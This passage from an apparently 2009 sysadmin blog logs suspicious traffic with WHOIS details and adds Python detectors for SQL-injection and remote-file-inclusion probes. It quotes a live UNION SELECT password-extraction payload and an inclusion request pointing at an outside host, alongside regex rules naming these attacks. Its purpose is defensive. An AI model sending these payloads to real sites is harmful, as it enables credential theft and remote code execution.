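# The probe exactly as quoted in the post: columns 1, password, 3..22.
COLS = ",".join(str(n) for n in range(3, 23))
PROBE = "/profile.php?name='+UNION+SELECT+1,password," + COLS + "+FROM+webl_admin%23"

# Constructed log entries (client IP, user agent, request URL). The IPs are
# documentation addresses; only PROBE and the perl user agent come from the page.
SAMPLE_LOG = [
    ("192.0.2.10", "libwww-perl/5.811", PROBE),
    # Same probe from another source, encoded and cased differently.
    ("198.51.100.7", "libwww-perl/5.811",
     "/profile.php?name=%27%20union%20select%201,password," + COLS
     + "%20from%20webl_admin%23"),
    ("203.0.113.5", "Mozilla/5.0 (Windows NT 6.1)",
     "/search.php?q=union+station+select+hotels"),
    ("203.0.113.6", "Mozilla/5.0 (Windows NT 6.1)", "/profile.php?name=O%27Brien"),
]

# Patterns are applied to the decoded, lower-cased query string.
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "quote_then_keyword": re.compile(r"['\"]\s*(?:union|or|and)\b"),
    "trailing_comment": re.compile(r"(?:#|--)\s*$"),
    "credential_column": re.compile(
        r"\bselect\b.*\b(?:password|passwd|pwd)\b.*\bfrom\b"),
}
# Library user agents: a hint that the client is a script, not a verdict.
SCRIPTED_CLIENT = re.compile(r"^(?:libwww-perl|python-requests|curl|wget)/", re.I)


def normalise(url):
    """Decode the query string the way the application would see it."""
    query = unquote_plus(urlsplit(url).query)
    return re.sub(r"\s+", " ", query).strip().lower()


def scan(entries):
    """Return one finding per request whose query matches any rule."""
    findings = []
    for ip, agent, url in entries:
        text = normalise(url)
        hits = sorted(name for name, rx in RULES.items() if rx.search(text))
        if hits:
            findings.append({
                "ip": ip,
                "path": urlsplit(url).path,
                "payload": text,
                "rules": hits,
                "scripted_client": bool(SCRIPTED_CLIENT.match(agent)),
            })
    return findings


def group_by_payload(findings):
    """Map each distinct decoded payload to the sorted source IPs sending it."""
    sources = defaultdict(set)
    for f in findings:
        sources[(f["path"], f["payload"])].add(f["ip"])
    return {key: sorted(ips) for key, ips in sources.items()}


if __name__ == "__main__":
    for (path, payload), ips in group_by_payload(scan(SAMPLE_LOG)).items():
        print(f"{path} from {len(ips)} source(s): {', '.join(ips)}")
        print(f"  decoded query: {payload}")
```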
CFNetwork
Getting hit with CFNetwork user agent from this IP: 24.41.43.231
OrgName: EARTHLINK, INC.
OrgID: EARTH-22
Address: 1375 PEACHTREE STREET
Address: LEVEL A
City: ATLANTA
StateProv: GA
PostalCode: 30309
Country: US
NetRange: 24.41.0.0 - 24.41.95.255
Seems to be a lot of odd traffic coming out of Atlanta networks lately.
Wednesday, July 15, 2009
Followsite on softlayer - misbehaving
Followsite bot hit our server over 70 times and appears to not be following robots.txt
Came from this IP:
74.86.223.42
SoftLayer Technologies Inc. SOFTLAYER-4-4 (NET-74-86-0-0-1)
74.86.0.0 - 74.86.255.255
ASX Networks ApS NET-74-86-223-40 (NET-74-86-223-40-1)
74.86.223.40 - 74.86.223.47
Wowrack - unidentified traffic
Web servers in this network appear to be trying to hit our server:
dotnetdotcom.org 208-115-111-240-SLASH28 (NET-208-115-111-240-1)
208.115.111.240 - 208.115.111.255
Wowrack.com WOW-ARIN-NET2 (NET-208-115-96-0-1)
208.115.96.0 - 208.115.127.255
Internode - Excessive traffic
We're getting excessive traffic from this IP range:
inetnum: 203.122.192.0 - 203.122.255.255
netname: INTERNODE1-NET
descr: Internode
descr: Internet Service Provider
descr: Adelaide, South Australia,
descr: Australia
country: AU
hacker - phpadmin
A hacker attempting to access phpadmin hit our server using Perl from multiple networks.
URL contained:
/profile.php?name='+UNION+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+webl_admin%23
User agent: libwww-perl/5.811
IP #1: 207.210.89.18
Network:
OrgName: Global Net Access, LLC
OrgID: GNAL-2
Address: 1100 White St SW
City: Atlanta
StateProv: GA
PostalCode: 30310
Country: US
ReferralServer: rwhois://rwhois.gnax.net:4321
NetRange: 207.210.64.0 - 207.210.127.255
CIDR: 207.210.64.0/18
OriginAS: AS3595, AS16626
NetName: GNAXNET
NetHandle: NET-207-210-64-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.GNAX.NET
NameServer: DNS2.GNAX.NET
NameServer: NS1.GNAX.NET
NameServer: NS2.GNAX.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
Comment: ********************************************
Comment: Reassignment information for this block is
Comment: available at rwhois.gnax.net port 4321
Comment: ********************************************
RegDate: 2005-04-12
Updated: 2007-06-01
RAbuseHandle: ABUSE745-ARIN
RAbuseName: GNAX ABUSE
RAbusePhone: +1-404-230-9150
RAbuseEmail: abuse@gnax.net
RNOCHandle: ENGIN7-ARIN
RNOCName: GNAX ENGINEERING
RNOCPhone: +1-404-230-9150
RNOCEmail: engineering@gnax.net
RTechHandle: ENGIN7-ARIN
RTechName: GNAX ENGINEERING
RTechPhone: +1-404-230-9150
RTechEmail: engineering@gnax.net
OrgAbuseHandle: ABUSE745-ARIN
OrgAbuseName: GNAX ABUSE
OrgAbusePhone: +1-404-230-9150
OrgAbuseEmail: abuse@gnax.net
OrgNOCHandle: ENGIN7-ARIN
OrgNOCName: GNAX ENGINEERING
OrgNOCPhone: +1-404-230-9150
OrgNOCEmail: engineering@gnax.net
OrgTechHandle: ENGIN7-ARIN
OrgTechName: GNAX ENGINEERING
OrgTechPhone: +1-404-230-9150
OrgTechEmail: engineering@gnax.net
IP #2: 62.146.47.98
inetnum: 62.146.47.96 - 62.146.47.111
netname: JF-NETWORK
descr: JFNetwork
descr: 97346 Iphofen
country: DE
admin-c: JF113-RIPE
tech-c: GT-RIPE
status: ASSIGNED PA
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered
person: Jochen Freier
address: Ritterstr. 11-17
address: 97318 Kitzingen
address: DE
phone: +49 9321 9297990
nic-hdl: JF113-RIPE
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered
person: Thorsten Grosse
address: IP Exchange GmbH
address: Am Tower 5
address: 90475 Nuernberg
address: DE
phone: +49 911 30950 000
abuse-mailbox: abuse@ip-exchange.de
nic-hdl: GT-RIPE
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered
% Information related to '62.146.0.0/16AS15598'
route: 62.146.0.0/16
descr: IP Exchange GmbH
origin: AS15598
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered
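The post above records the same UNION SELECT request arriving from two different networks with a libwww-perl user agent. The following is an added example, not code from this blog: it scans access-log lines, decodes each query parameter, and groups injection payloads by source address so a probe repeated across networks stands out. The log lines are constructed samples in combined log format with documentation-range addresses, and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined log format). The addresses are
# documentation ranges, not the IPs reported in the post.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Jul/2009:10:01:02 +0000] "GET /profile.php?name='+UNION+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+webl_admin%23 HTTP/1.1" 404 512 "-" "libwww-perl/5.811"
198.51.100.7 - - [15/Jul/2009:10:03:40 +0000] "GET /profile.php?name=%27+union+select+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+webl_admin%23 HTTP/1.1" 404 512 "-" "libwww-perl/5.811"
203.0.113.5 - - [15/Jul/2009:10:05:00 +0000] "GET /profile.php?name=alice HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
203.0.113.9 - - [15/Jul/2009:10:06:11 +0000] "GET /news.php?title=student+union+select+committee HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
# Client libraries named in this blog's posts, matched at the start of the UA.
SCRIPTED_UA = re.compile(
    r"^(?:libwww-perl|lwp-trivial|wget|python|java|php)\b", re.I
)


def normalize(value):
    """Lower-case and collapse whitespace so re-encoded copies compare equal."""
    return " ".join(value.lower().split())


def looks_like_union_injection(value):
    """UNION SELECT plus a quote breakout or a trailing SQL comment marker.

    Requiring the second signal keeps ordinary text that happens to contain
    the words "union select" from being flagged.
    """
    if not UNION_SELECT.search(value):
        return False
    has_quote = "'" in value or '"' in value
    has_comment_tail = value.endswith(("#", "--"))
    return has_quote or has_comment_tail


def find_union_probes(log_text):
    """Return {(path, param, payload): details} for injection-like requests."""
    probes = defaultdict(lambda: {"sources": set(), "agents": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl turns '+' into spaces and decodes %27 / %23.
        for param, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = normalize(raw)
            if looks_like_union_injection(value):
                hit = probes[(parts.path, param, value)]
                hit["sources"].add(m.group("ip"))
                hit["agents"].add(m.group("ua"))
    return {
        key: {
            "sources": sorted(hit["sources"]),
            "agents": sorted(hit["agents"]),
            "scripted_client": any(
                SCRIPTED_UA.match(ua) for ua in hit["agents"]
            ),
        }
        for key, hit in probes.items()
    }


def multi_source(probes):
    """Payloads seen from more than one address: one actor, several networks."""
    return [key for key, hit in probes.items() if len(hit["sources"]) > 1]


if __name__ == "__main__":
    found = find_union_probes(SAMPLE_LOG)
    for key in multi_source(found):
        path, param, payload = key
        print(path, param, found[key]["sources"], found[key]["agents"])
```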
Sunday, July 12, 2009
123people dot com is stealing content
The 123people dot com site is stealing and reposting personal information from social networks like Myspace, Facebook.com, LinkedIn.com, Amazon (people's wish lists) and zoominfo.
In addition to scraping sites and posting photos, links and personal data that is not publicly available on these social networking sites, 123people is posting completely bogus data about people including false addresses and fake information.
Facebook has been kind enough to get scraped content and photos from their web site removed from this site. Other social networks like MySpace, Linkedin, Google, Amazon and ZoomInfo have been contacted to do the same by users.
This company 123People has been contacted to remove various profiles but is apparently not doing this so far.
Saturday, July 11, 2009
.Net Framework hitting sites
129.7.111.207 is hitting our site with .NET Framework/2.0
OrgName: University of Houston
OrgID: UNIVER-239
Address: Information Technology
Address: Computing & Telecommunication Services
Address: 4213 Elgin Blvd
City: Houston
StateProv: TX
PostalCode: 77204-1010
Country: US
NetRange: 129.7.0.0 - 129.7.255.255
lwp-trivial
Hit with a bot called lwp-trivial/1.41 from this IP: 128.114.48.94 - a university in California:
OrgName: University of California, Santa Cruz
OrgID: UCSC
Address: University of California, Santa Cruz
Address: UCSC Information Technology Services
Address: Communications Building
Address: 1156 High Street
City: Santa Cruz
StateProv: CA
PostalCode: 95064
Country: US
NetRange: 128.114.0.0 - 128.114.255.255
CIDR: 128.114.0.0/16
Dragonfly User Agent
Some kind of dragonfly user agent hit our site which appears to be possibly related to some type of open source content management system doing some dirty business.
The hit appears to be coming from:
Enmax Envision Inc. ENMAXENV-BLOCK2 (NET-72-29-224-0-1)
72.29.224.0 - 72.29.255.255
PlayStarMusic Corporation ENV-PM-72-29-233-160 (NET-72-29-233-160-1)
72.29.233.160 - 72.29.233.191
Clearwire Billing Issues
Something is really wrong in the Clearwire billing department. There's a whole web site dedicated to complaining about Clearwire which cannot be good for business:
ClearwireSucks.com
At first I was taken aback by this page as I had tried out this network and had an OK experience. It's not as fast as Comcast but obviously you can travel around. It's not as reliable as an AT&T or Verizon card - definitely less coverage - but it's a bit faster than a cellular card. I thought it could use some improvement working in transit - doesn't seem to switch between towers too well or pick up signals well when traveling - but sucks? I didn't think it was that bad...until...
I canceled. I called up and the woman told me to wait until after XYZ date and then I would avoid the cancellation fee. So I did. After that date I called a guy and said I wanted to cancel and that the woman had told me to wait until after that date. I told him I had already gone through the options with the other woman, but I specifically told him I wanted to make sure I didn't get a cancellation fee, so I had waited until after the date she gave me.
So a few weeks later - I get a $110 bill on my credit card. Hmm. I called them and waited on hold forever and some woman told me someone was going to take care of it. I submitted a dispute to my credit card company. The charge was reversed.
Two weeks later - Clearwire charged the cancellation fee to my card again! This time they pushed my card over the limit and caused me to incur additional fees. Once again I am reversing the charges...
It seems like something really fishy is going on over there at Clearwire. I mean yes, ok to charge me the fee once by mistake is annoying and time consuming but to charge the fee AGAIN after it has been disputed and reversed and I specifically followed the instructions they told me on the phone?
I wonder if there's some type of fraudulent activity going on in that billing department the company doesn't even know about which is causing them to get into this class action lawsuit over their billing practices shown on the ClearwireSucks.com site.
The sad thing is, I had a decent impression of Clearwire before all of this and I thought those people on that web site just couldn't read and follow instructions. I know for a fact I waited until after the date I was given on the phone, so now I know that probably the other people there aren't exactly crazy. Not to mention there are too many of them to be a coincidence.
I hope Clearwire can fix this issue because they have a really interesting business model and service and would be a shame for it to go under due to a simple problem in their billing department they cannot fix. It seems like they need to have some kind of better auditing processes and make sure what is communicated to customers is accurate and complete information.
Friday, July 10, 2009
Amazon cloud once again...
Once again someone on the Amazon cloud network is trying to access our sites in programmatic ways:
OrgName: Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2
Address: 1200 12th Avenue South
City: Seattle
StateProv: WA
PostalCode: 98144
Country: US
NetRange: 75.101.128.0 - 75.101.255.255
Someone or something at A2 hosting attempted to access our sites using some sort of PHP client:
Internet 123, Inc. INTERNET-BLK-I123-3 (NET-69-39-64-0-1)
69.39.64.0 - 69.39.95.255
A2 Hosting, Inc. I123-069039089000-032004 (NET-69-39-89-0-1)
69.39.89.0 - 69.39.89.255
Hopefully Internet 123, Inc. and/or A2 Hosting, Inc. will take a look at this and do something about it.
The offending IP: 69.39.89.40 tried to access our sites with two different versions of PHP.
MCI / Proxy IT - bad traffic
Someone in this proxy IP range attempted to hit our sites with Python.
65.200.199.106 at 7/5/2009 10:46:19 PM
MCI Communications Services, Inc. d/b/a Verizon Business UUNET65 (NET-65-192-0-0-1)
65.192.0.0 - 65.223.255.255
Proxy IT UU-65-200-199-D6 (NET-65-200-199-0-1)
65.200.199.0 - 65.200.199.255
MCI should really do something about this because clearly someone is using this proxy to attempt to do their dirty work.
Bot out of University of Toronto
BlogScope bot hit our sites from University of Toronto
128.100.20.21
OrgName: University of Toronto
OrgID: UNIVER-36
Address: Computing and Networking Services
Address: 4 BANCROFT AVENUE - ROOM 101C
City: TORONTO
StateProv: ON
PostalCode: M5S-1C1
Country: CA
NetRange: 128.100.0.0 - 128.100.255.255
University Santa Cruz - WGet hackers
Someone at the University of Santa Cruz is attempting to access our sites using WGET from this IP 128.114.48.95 at 7/7/2009 7:53:48 PM
OrgName: University of California, Santa Cruz
OrgID: UCSC
Address: University of California, Santa Cruz
Address: UCSC Information Technology Services
Address: Communications Building
Address: 1156 High Street
City: Santa Cruz
StateProv: CA
PostalCode: 95064
Country: US
NetRange: 128.114.0.0 - 128.114.255.255
Colin-Miller - hitting our sites with Java
Someone at Colin Miller in San Francisco, California is attempting to access our sites with some type of Java client.
Comcast Business Communications, Inc. CBC-SFBA-13 (NET-173-11-64-0-1)
173.11.64.0 - 173.11.127.255
Comcast Business Communications, Inc. CBC-CM-4 (NET-173-8-0-0-1)
173.8.0.0 - 173.15.255.255
Colin Miller-San Francisco-CA-18 COLIN-MILLER-SAN-FRANCISCO-CA-18 (NET-173-11-77-96-1)
173.11.77.96 - 173.11.77.111
Programmatic traffic from eNet / XLHost
Getting clearly programmatic traffic from this network:
eNET Inc. ENET-XLHOST-2 (NET-173-45-64-0-1)
173.45.64.0 - 173.45.127.255
XLHost.com Inc XLHOST-OOFFER3-4941 (NET-173-45-84-80-1)
173.45.84.80 - 173.45.84.95
Managed Solutions Group - Malware
Someone attempted to get at our web server using a Java software client of some kind from this IP: 205.209.142.43
This IP belongs to "Managed Solutions Group" in California:
OrgName: Managed Solutions Group, Inc.
OrgID: MSG-48
Address: 45535 Northport Loop East
City: Fremont
StateProv: CA
PostalCode: 94538
Country: US
ReferralServer: rwhois://rwhois.managedsg-inc.com:4321
NetRange: 205.209.128.0 - 205.209.191.255
Twiceler - still doesn't obey robots.txt
Getting tons of hits from the Twiceler bot, which is still not obeying the robots.txt file. The hits are quite excessive. If they don't stop, we may just block them at the firewall level.
Some of the IPs:
38.99.44.105
216.129.119.42
216.129.119.12
216.129.119.44
216.129.119.40
216.129.119.49
38.99.44.102
Tuesday, July 07, 2009
Problem with MS Terminal Services / VPN
There is a problem with Terminal Services from Microsoft and/or Cisco's VPN product. When I use the Cisco client and VPN with Terminal Services and my connection gets disrupted in some way while I am connected to my server, first of all I cannot reconnect to the VPN. Perhaps the VPN/firewall thinks I am still connected, or maybe the services on my machine get corrupted in some way and cause this problem.
The second problem is that after I reboot (potentially restarting some services would also resolve this) and reconnect to my VPN, Microsoft Terminal Services on the computer to which I was connected says all the Terminal Services sessions are in use and I cannot get back into my box. This is a potential security problem if someone else was able to connect to that particular session. It doesn't make any sense that I would show as still being connected, because one particular account is supposed to terminate on disconnect or log out, so I should be able to get back in on that account after the network disruption.
On the flip side, I've had a problem where a particular account using Terminal Services is NOT supposed to shut down on disconnect, and when I get booted off the VPN via a network disruption, that account would shut down even when in theory it should not. It seems like maybe that problem was fixed but a new problem has arisen as a result of whatever changed.
Friday, July 03, 2009
Service Provider Corporation
If you've seen Service Provider Corporation IP addresses in your logs and then tried to find information about the company you'll end up here:
http://www.wdspco.org/
OrgName: Service Provider Corporation
OrgID: SPC-10
Address: 442 Route 202-206 North
Address: # 485
City: Bedminster
StateProv: NJ
PostalCode: 07921-0523
Country: US
NetRange: 166.128.0.0 - 166.255.255.255
CIDR: 166.128.0.0/9
NetName: NETBLK-CDPD-B
NetHandle: NET-166-128-0-0-1
This is an organization that allocates IP addresses to various wireless providers. Presumably some odd traffic on our server is from AT&T since the user agent appears to be iPhones. However the iPhones are acting a little strange and using a lot of different IP addresses for what appears to be the same web request. I could be wrong. We'll have to dig into this a bit more...
The other problem with this organization is that it actually hides the true source of the traffic in some cases. Someone on this network actually hacked into my web mail provider one time and apparently was reading my email. This organization states on their web site on a page that is not search engine friendly:
The WDSPCo NIC administers and maintains the IP address blocks that are leased from ARIN. The NIC assigns IP address blocks to WDSPCo members on request in accordance to the WDSPCo IP Management rules and the ARIN IP rules.
The NIC is also responsible for the WDSPCo DNS server. The NIC maintains the server. They also update with member server information for the reverse DNS lookup table for the leased IP blocks. When requesting a new block of IP addresses, members can supply their DNS server names so that the NIC can assign those server names to the IP block on the DNS server at the time of allocation. IP blocks can be leased without DNS server assignments.
The problem here is that some of the traffic coming from this IP range appears to be under the cover of this organization's name and you cannot truly report the source of the bad traffic to the company from whence it came if the IPs have been leased to someone else and not appropriately identified. In my opinion this organization should be forced by law to list both their name AND the name of the wireless company that is sending traffic to your sites.
Thursday, July 02, 2009
123People - illegal scraping and reposting of content
123People.com is illegally scraping and reposting content from other web sites.
Information posted on social networks is posted by people who allow that particular social network to display information, some of it public, some of it not. This particular site has posted public information on their web site which I did not make available to the public. They have also posted photos which they are not authorized to copy off the other web site where I had posted it.
When you contact a web site that has posted information about you and you want it taken down, the professional thing to do would be to remove it. In this case this site appears to be posting private information and then trying to get you to use a service to get it removed. This is really shady business practice. I would recommend NOT contacting the "free" services they list but rather contact a lawyer, search engines and elected officials to get these types of unwanted posting of personal information on the web to stop.
123People.com was probably just created to grab your information and post it publicly in a way you don't like with other bogus information, then send you to a third party to clean it up. They need to take responsibility for the content they are posting. Additionally their scraping practices should be illegal if they are not. 123People.com also posts so much bogus information - there should be a law against that as well and some recourse for people whose information has been posted inaccurately or against their will and the person posting it refuses to remove it.
A better approach would probably be to get a lawyer or blog about 123People as I have done so other people can be warned and find it - and also complain to Google and other search engines using their functions for doing so, and your elected officials to get laws in place that prevent posting private information without your consent on web sites.
Here is the information from the 123People web site - again, don't pay them to take down things you didn't authorize them to post. There needs to be a better solution to this situation:
______________________________________________________________
How do I delete the search results on the 123people?
123people refers to information originating from the other publicly available websites on the Internet. All we do is provide the viewing of the real time search results available on the Internet in a clear and well-arranged way.
If you want to edit or to delete information, there are two possibilities:
1. Contact the original source
If you want to delete the contents, please contact directly the original source of the information. You can find the source by clicking on the small icon to the left of all displayed results. Your support team will take care of your request voluntarily and free of charge.
2. Professional Services
There are services that take care of their customers online. We have selected a few of those services that you can use. Please contact one of the services of your choice directly for further information.
www.reputationdefender.com
www.myonid.com
Indication: 123people accesses data that have been found on other websites by classical search engines such as Yahoo. Search engines save the found information for certain period of time. These search engines do not explore all websites at the same time – that depends on how often the content on the website is updated, amongst other things – so it might take some time, (sometimes even months), until certain content has disappeared from the search results of big search engines. The information may appear on the site of 123people even if the source of the information has already been deleted.
The web site www.reputationdefender.com as well as www.myonid.com are independent companies who offer their services for free and do not stand in any form of cooperation with 123people.
Information posted on social networks is posted by people who allow that particular social network to display information, some of it public, some of it not. This particular site has posted public information on their web site which I did not make available to the public. They have also posted photos which they are not authorized to copy off the other web site where I had posted it.
When you contact a web site that has posted information about you and you want it taken down, the professional thing to do would be to remove it. In this case this site appears to be posting private information and then trying to get you to use a service to get it removed. This is really shady business practice. I would recommend NOT contacting the "free" services they list but rather contact a lawyer, search engines and elected officials to get these types of unwanted posting of personal information on the web to stop.
123People.com was probably just created to grab your information and post it publicly in a way you don't like with other bogus information, then send you to a third party to clean it up. They need to take responsibility for the content they are posting. Additionally their scraping practices should be illegal if they are not. 123People.com also posts so much bogus information - there should be a law against that as well and some recourse for people whose information has been posted inaccurately or against their will and the person posting it refuses to remove it.
A better approach would probably be to get a lawyer or blog about 123People as I have done so other people can be warned and find it - and also complain to Google and other search engines using their functions for doing so, and your elected officials to get laws in place that prevent posting private information without your consent on web sites.
Here is the information from the 123People web site - again, don't pay them to take down things you didn't authorize them to post. There needs to be a better solution to this situation:
______________________________________________________________
How do I delete the search results on the 123people?
123people refers to information originating from the other publicly available websites on the Internet. All we do is provide the viewing of the real time search results available on the Internet in a clear and well-arranged way.
If you want to edit or to delete information, there are two possibilities:
1. Contact the original source
If you want to delete the contents, please contact directly the original source of the information. You can find the source by clicking on the small icon to the left of all displayed results. Your support team will take care of your request voluntarily and free of charge.
2. Professional Services
There are services that take care of their customers online. We have selected a few of those services that you can use. Please contact one of the services of your choice directly for further information.
www.reputationdefender.com
www.myonid.com
Indication: 123people accesses data that have been found on other websites by classical search engines such as Yahoo. Search engines save the found information for certain period of time. These search engines do not explore all websites at the same time – that depends on how often the content on the website is updated, amongst other things – so it might take some time, (sometimes even months), until certain content has disappeared from the search results of big search engines. The information may appear on the site of 123people even if the source of the information has already been deleted.
The web site www.reputationdefender.com as well as www.myonid.com are independent companies who offer their services for free and do not stand in any form of cooperation with 123people.
Monday, June 29, 2009
Embarq Corporation - Malformed web requests
We are getting malformed web requests from this IP address on the Embarq Corporation network:
67.237.204.65
In fact we have seen a lot of bad traffic from Embarq network address ranges in the past.
OrgName: Embarq Corporation
OrgID: EMBAR
Address: 500 N New York Ave
City: Winter Park
StateProv: FL
PostalCode: 32789
Country: US
NetRange: 67.232.0.0 - 67.239.255.255
Friday, June 26, 2009
XLHost - Trying to access our sites programmatically
XLHost IP ranges continue to try to access our sites programmatically:
eNET Inc. ENET-XLHOST-2 (NET-173-45-64-0-1)
173.45.64.0 - 173.45.127.255
XLHost.com Inc XLHOST-DTODD1-5959 (NET-173-45-70-176-1)
173.45.70.176 - 173.45.70.183
Bad requests - Verizon
Got over 1200 bad requests from this IP on the Verizon network today: 71.176.87.58
OrgName: Verizon Internet Services Inc.
OrgID: VRIS
Address: 1880 Campus Commons Dr
City: Reston
StateProv: VA
PostalCode: 20191
Country: US
NetRange: 71.173.96.0 - 71.180.255.255
CIDR: 71.173.96.0/19, 71.173.128.0/17, 71.174.0.0/15, 71.176.0.0/14, 71.180.0.0/16
NetName: VIS-BLOCK
NetHandle: NET-71-173-96-0-1
Parent: NET-71-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.BELLATLANTIC.NET
NameServer: NS2.BELLATLANTIC.NET
NameServer: NS2.VERIZON.NET
NameServer: NS4.VERIZON.NET
Strange requests / odd headers
We're getting strange requests on our server for files we don't host like this:
ip: 69.72.169.233
query string: path[docroot]=http://barrasford.net/barras/1.swf??
Fri Jun 26 15:39:20 PDT 2009
User Agent: Mozilla/5.0
Headers:
TE: deflate,gzip;q=0.3
Connection: TE, close
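A request parameter whose value is a URL on somebody else's host, as in the query string above, is the usual signature of a remote file inclusion probe against PHP applications. The following is an added example, not code from this blog, that flags such parameters in logged query strings; the function names, the own-hosts allow-list and every sample query other than the one logged above are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REMOTE_SCHEMES = {"http", "https", "ftp"}

# PHP superglobal names that should never arrive as request parameters.
SUPERGLOBAL_RE = re.compile(
    r"^(_(SERVER|GET|POST|COOKIE|ENV|FILES|REQUEST|SESSION)|GLOBALS)(\[|$)", re.I
)


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_query(query_string, own_hosts=frozenset()):
    """Return one finding per suspicious parameter in a raw query string.

    own_hosts is a hypothetical allow-list of host names that belong to the
    site itself, so links back to our own pages are not reported.
    """
    findings = []
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        value = fully_decode(value).strip()
        reasons = []
        if SUPERGLOBAL_RE.match(name):
            reasons.append("parameter named after a PHP superglobal")
        try:
            parts = urlsplit(value)
            host = (parts.hostname or "").lower()
            scheme = parts.scheme.lower()
        except ValueError:  # malformed netloc such as "http://["
            host, scheme = "", ""
        if scheme in REMOTE_SCHEMES and host and host not in own_hosts:
            reasons.append("value is a URL on a foreign host")
            if value.endswith("?"):
                reasons.append("URL ends in '?'")
        if reasons:
            findings.append({"param": name, "host": host, "reasons": reasons})
    return findings


# The first query string is the one logged above; the rest are constructed.
SAMPLE_QUERIES = [
    "path[docroot]=http://barrasford.net/barras/1.swf??",
    "page=2&ref=http://www.example.com/home",
    "inc=http%253A%252F%252Ffiles.example.net%252Fa.txt",
    "_SERVER[DOCUMENT_ROOT]=http://files.example.net/b.gif???",
    "q=rhododendron+care",
]

if __name__ == "__main__":
    for query in SAMPLE_QUERIES:
        hits = inspect_query(query, own_hosts={"www.example.com"})
        print("SUSPICIOUS" if hits else "ok        ", query, hits)
```
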
Thursday, June 25, 2009
author.dll
A bot called core-project is coming from different URLs and attempting to access something called author.dll on our server:
6/19/2009 11:03:08 PM 125.244.77.2 /_vti_bin/_vti_aut/author.dll core-project/1.0 POST
6/18/2009 3:14:16 PM 62.212.123.125 /_vti_bin/_vti_aut/author.dll core-project/1.0
Wednesday, June 24, 2009
Alaska Communications Group
Based on recent activity on my server, I have a hunch there are hackers coming out of this network but couldn't prove it at the moment. Will have to keep an eye on this...
OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US
ReferralServer: rwhois://rwhois.acsalaska.net:4321
NetRange: 216.67.0.0 - 216.67.127.255
Tuesday, June 23, 2009
Turnitin Bot - Odd behavior
Turnitin bot is requesting pages and types of technology that haven't existed on one of our sites for years - probably over five years.
First question is - where are they even getting these links?
Second question is - why are they not obeying robots.txt for this site?
Turnitin bot is on this network:
O1.com NETBLK-O1-BLK4 (NET-65-98-128-0-1)
65.98.128.0 - 65.98.255.255
iParadigms, LLC NETBLK-65-98-224-0 (NET-65-98-224-0-1)
65.98.224.0 - 65.98.224.31
SuperPages Bot - Bogus Requests?
The SuperPages bot is submitting web requests that don't appear to be true. I'm not even sure if this bot is really from super pages. It lists a particular web page as the referrer, but after visiting that web page, there are clearly no links to our sites on that page. Obviously the bot is making up bogus information that could skew marketing results. I hope people are also not paying for bogus clicks from this company as a result of this activity.
The IP address from which the bogus web request came: 151.138.13.244
Suspicious Login Activity
I just logged into my web server. First connect to VPN, then type in admin password.
I typed in the administrator password numerous times. I know it was exactly the right password. I must have typed it 10 or 20 times. I even typed it out in Notepad so I could see what I was typing to verify I was typing the right thing.
About the 20th attempt - suddenly the password worked. This is the same password I typed each time over and over again very carefully after it failed the first few times.
Something very strange is going on...time to change passwords.
Friday, June 19, 2009
AT&T Wireless - Reports people in Florida when Not
AT&T Wireless reports people as logging in from Florida using their laptop connect cards when they are at the opposite side of the country. You'd think with all the work on GPS and the government mandate regarding pinpointing people's locations when they are on cell phones for 911 calls that they would also accurately pinpoint locations when using laptop connect cards.
This is the network you get when you look up the associated IP addresses:
OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US
NetRange: 32.0.0.0 - 32.255.255.255
Perhaps this is for security reasons or otherwise, I'm not sure, but if they are serving up an IP in LA or Seattle it seems like they could pull it from an associated IP range mapped to that city so locations can be accurately reported in logs. This is another hole for cyber criminals - like AOL's IP address reporting, which basically does the same thing. Everyone is in Virginia according to their IP ranges.
And by the way those ads "I just found the Internet" in all these out of the way places - AT&T Wireless doesn't work in the heartland in Wisconsin. It may be a little remote compared to a large city but it's not exactly Timbuktu. There are a bunch of towns out there with a significant enough population to have a Walmart that don't have any coverage.
Thursday, June 18, 2009
Mail.Ru/1.0 not obeying Robots.txt
This bot Mail.Ru/1.0 read robots.txt, ignored it and tried to access a page anyway from this IP address 94.100.181.242
Wednesday, June 17, 2009
GoogleImageBot - Annoying
We have a site where we disallow the google image bot. We started putting the photos on a subdomain of that web site. Google-bot apparently scanned and put all the images on that subdomain on the net even though our robots.txt file for that site tells Google to bug off and there's no link to those images except from our site.
